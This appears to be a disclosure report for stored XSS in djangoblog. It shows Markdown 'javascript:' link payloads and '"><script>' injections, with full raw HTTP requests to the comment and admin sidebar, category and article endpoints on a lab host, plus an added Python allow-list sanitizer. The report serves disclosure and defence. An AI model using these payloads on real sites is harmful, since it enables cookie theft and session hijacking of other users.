Stored XSS via Markdown Comment in liangliangyy/djangoblog
Reported on
Apr 6th 2023
Description
Register an account on the blog; once the account is activated, it can post comments.
Comments can be written in Markdown, and the Markdown link syntax is rendered into an anchor without the URL scheme being checked, so a `javascript:` link is emitted as-is.
When another user clicks the link in the comment, the script runs in that user's browser (an XSS alert).
I cloned the project with git and built it with Docker. The latest commit is: 07a1ded08eb4e0c6979f6aeebc35f3864ba250a7
Proof of Concept
Payload:
[a](javascript:prompt(document.cookie))
[Basic](javascript:alert('xss'))
POST /article/1/postcomment HTTP/1.1
Host: 192.168.125.133
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.125.133/article/2023/4/6/1.html
Content-Type: application/x-www-form-urlencoded
Content-Length: 206
Origin: http://192.168.125.133
Connection: close
Cookie: REMEMBERME=V2FsbGFiYWdcVXNlckJ1bmRsZVxFbnRpdHlcVXNlcjpkSFZoYm5SbzoxNzExODU2NTQ0Ojk4OTI2YTZkOWM1YmE2OTEzYTk5MzMzNWVjMjE3NWU2YjdkNzg5N2FmNWVkZjg4ZDZmMjBkZTg1ODMxNmM3YjU%3D; Hm_lvt_c790ac2bdc2f385757ecd0183206108d=1680331398; auth=%5B%22admin%22%2C%227676aaafb027c825bd9abab78b234070e702752f625b752e55e55b48e607e358%22%5D; csrftoken=OH2D3FHqNQqmFTVYnsIHXfheAaMZ3KnK; sessionid=kiqlg6int19jse966u7ozov5r1s2c9sh
Upgrade-Insecure-Requests: 1
csrfmiddlewaretoken=Qihis6iSMnxK4jyE7zzlItn7EdQ7LrMCuP9LlBP8p3NWz2jskR7Svyub4dsWE1Zc&body=%5Ba%5D%28javascript%3Aprompt%28document.cookie%29%29&parent_comment_id=&submit=%E5%8F%91%E8%A1%A8%E8%AF%84%E8%AE%BA..
When another user reads the blog and clicks the comment link, an alert is shown.
OTHER
Besides the XSS that a regular user can cause through the comment function, I also see XSS when an admin adds or edits a post, sidebar, or category. When the payload is placed in those parameters, the script runs for every user who loads the site. For more information see the second set of occurrences below.
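Both findings above come down to user-controlled text reaching the page without an allow-list filter: the comment renderer emits a `javascript:` href, and the admin fields are reflected with raw `"><script>` sequences. The following is an added example of the sanitizing step that would close both holes; it is not djangoblog's code and does not show the project's own rendering path. It takes the HTML a Markdown renderer produces (constructed sample input) and keeps only allow-listed tags and safe link schemes.

```python
# Added example (not djangoblog's code): allow-list sanitizer for HTML produced by a
# Markdown renderer or entered in admin fields. Drops javascript:/data: links and
# escapes any tag outside the allow-list, so the browser gets nothing to execute.
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlparse

ALLOWED_TAGS = {"p", "a", "em", "strong", "code", "pre", "ul", "ol", "li", "blockquote"}
SAFE_SCHEMES = {"http", "https", "mailto", ""}   # "" means a relative URL


def safe_href(url: str) -> bool:
    """Accept only http(s)/mailto or relative URLs; reject javascript:, data:, etc."""
    # Remove whitespace/control characters first: browsers tolerate "java\nscript:".
    cleaned = "".join(ch for ch in url if ch.isprintable() and not ch.isspace())
    return urlparse(cleaned).scheme.lower() in SAFE_SCHEMES


class Sanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []

    def handle_starttag(self, tag, attrs):
        if tag not in ALLOWED_TAGS:
            return                      # unknown tag (script, img, ...) is dropped
        parts = [tag]
        if tag == "a":
            href = dict(attrs).get("href") or ""
            if safe_href(href):
                parts.append('href="%s" rel="nofollow noopener"' % escape(href, quote=True))
        # every other attribute (onclick, style, ...) is discarded
        self.out.append("<%s>" % " ".join(parts))

    def handle_endtag(self, tag):
        if tag in ALLOWED_TAGS:
            self.out.append("</%s>" % tag)

    def handle_data(self, data):
        self.out.append(escape(data))   # text nodes are always re-escaped


def sanitize(rendered_html: str) -> str:
    """Return HTML containing only allow-listed tags and safe hrefs."""
    s = Sanitizer()
    s.feed(rendered_html)
    s.close()
    return "".join(s.out)


if __name__ == "__main__":
    # Constructed inputs mirroring the report: a Markdown-rendered javascript: link
    # and the admin-field payload.
    print(sanitize('<p><a href="javascript:prompt(document.cookie)">a</a></p>'))
    print(sanitize('1"><script>alert(a)</script>'))
```

The sanitized string is what should be marked safe for the template; anything still containing `javascript:` or an unescaped `<script` after this step indicates the filter was bypassed and is worth logging.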
Impact
XSS can cause serious issues. Attackers often leverage XSS to steal session cookies and impersonate the user.
Occurrences
admin.py L114-L125
Sidebar create/edit:
POST /admin/blog/sidebar/1/change/ HTTP/1.1
Host: 192.168.125.133
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.125.133/admin/blog/sidebar/1/change/
Content-Type: application/x-www-form-urlencoded
Content-Length: 240
Origin: http://192.168.125.133
Connection: close
Cookie: REMEMBERME=V2FsbGFiYWdcVXNlckJ1bmRsZVxFbnRpdHlcVXNlcjpNVEVpUGp4elkzSnBjSFErWVd4bGNuUW9KMWhUVXljcFBDOXpZM0pwY0hRKzoxNzExODU2NzYyOjAxMDIwM2VmMmY1NTU2OGUzZTc2NjY0N2I2NTU4NDYxNjc1MDU5ZDZkMmY3N2ZiNGEyNWVlNWMzMmI4YTdjNTE%3D; csrftoken=3OcxwMXavXh7dZpOcnbBOiXu8s0BCrIW; sessionid=mn6hj5i3oold6ag7ow3jzu77tginluur
Upgrade-Insecure-Requests: 1
csrfmiddlewaretoken=pFnbOlOj9r3UqDODE0ihYVrAcJfvccpAijpyaXBjueaRts3hGdjIC3eUa15WEtXm&name=1%22%3E%3Cscript%3Ealert%28a%29%3C%2Fscript%3E&content=1%22%3E%3Cscript%3Ealert%28a%29%3C%2Fscript%3E&sequence=0&is_enable=on&_save=%E4%BF%9D%E5%AD%98
Category create/edit:
POST /admin/blog/category/1/change/ HTTP/1.1
Host: 192.168.125.133
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.125.133/admin/blog/category/1/change/
Content-Type: application/x-www-form-urlencoded
Content-Length: 187
Origin: http://192.168.125.133
Connection: close
Cookie: REMEMBERME=V2FsbGFiYWdcVXNlckJ1bmRsZVxFbnRpdHlcVXNlcjpNVEVpUGp4elkzSnBjSFErWVd4bGNuUW9KMWhUVXljcFBDOXpZM0pwY0hRKzoxNzExODU2NzYyOjAxMDIwM2VmMmY1NTU2OGUzZTc2NjY0N2I2NTU4NDYxNjc1MDU5ZDZkMmY3N2ZiNGEyNWVlNWMzMmI4YTdjNTE%3D; csrftoken=3OcxwMXavXh7dZpOcnbBOiXu8s0BCrIW; sessionid=mn6hj5i3oold6ag7ow3jzu77tginluur
Upgrade-Insecure-Requests: 1
csrfmiddlewaretoken=dKVOOPwuo2wTeFU4Suka43bxu1lNrzFv6oXbarjuJPDQhu9IUHlBIbYRsjbeTQdh&name=1%22%3E%3Cscript%3Ealert%2899%29%3C%2Fscript%3E&parent_category=&index=1&_save=%E4%BF%9D%E5%AD%98
Article create/edit:
POST /admin/blog/article/3/change/ HTTP/1.1
Host: 192.168.125.133
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.125.133/admin/blog/article/3/change/
Content-Type: application/x-www-form-urlencoded
Content-Length: 529
Origin: http://192.168.125.133
Connection: close
Cookie: REMEMBERME=V2FsbGFiYWdcVXNlckJ1bmRsZVxFbnRpdHlcVXNlcjpNVEVpUGp4elkzSnBjSFErWVd4bGNuUW9KMWhUVXljcFBDOXpZM0pwY0hRKzoxNzExODU2NzYyOjAxMDIwM2VmMmY1NTU2OGUzZTc2NjY0N2I2NTU4NDYxNjc1MDU5ZDZkMmY3N2ZiNGEyNWVlNWMzMmI4YTdjNTE%3D; csrftoken=3OcxwMXavXh7dZpOcnbBOiXu8s0BCrIW; sessionid=mn6hj5i3oold6ag7ow3jzu77tginluur
Upgrade-Insecure-Requests: 1
csrfmiddlewaretoken=MNde063Oc91PoCg3hhB9yI2jwxRfCSBRFrfBmIQOxW8MrrvHjuCAcQPDuPHG499D&title=TEST&body=11%22%3E%3Cscript%3Ealert%28%27post%27%29%3C%2Fscript%3E&id_body-wmd-wrapper-html-code=%3Cp%3E11%E2%80%9D%26gt%3B%26lt%3Bscript%26gt%3Balert%28%E2%80%98post%E2%80%99%29%26lt%3B%2Fscript%26gt%3B%3C%2Fp%3E%0D%0A&pub_time_0=2023%2F04%2F07&pub_time_1=00%3A57&initial-pub_time_0=2023%2F04%2F07&initial-pub_time_1=00%3A57&status=p&comment_status=o&type=a&views=9&author=1&article_order=0&category=1&tags_old=1&_save=%E4%BF%9D%E5%AD%98